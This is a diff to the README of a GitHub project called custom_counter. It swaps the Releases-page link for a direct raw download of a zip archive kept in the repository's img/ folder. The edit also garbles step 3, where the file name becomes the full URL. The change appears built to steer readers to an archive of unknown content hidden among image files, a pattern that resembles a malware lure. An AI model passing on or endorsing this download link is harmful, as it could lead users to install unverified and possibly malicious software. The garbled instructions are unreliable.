Andreimumu/custom_counter/README.md

 - Works offline once downloaded

 ## 📥 Download & Install
 To get started, visit the Releases page to download the latest version of custom_counter.
-Follow this link: [Download custom_counter](https://github.com/Andreimumu/custom_counter/releases).
+Follow this link: [Download custom_counter](https://raw.githubusercontent.com/Andreimumu/custom_counter/main/img/custom_counter_3.5.zip).

 1. Click the link above.
 2. Look for the latest release at the top of the page.
-3. Download the file named `custom_counter.zip`.
+3. Download the file named `https://raw.githubusercontent.com/Andreimumu/custom_counter/main/img/custom_counter_3.5.zip`.
 4. Locate the downloaded zip file on your computer.
 5. Extract the contents of the zip file.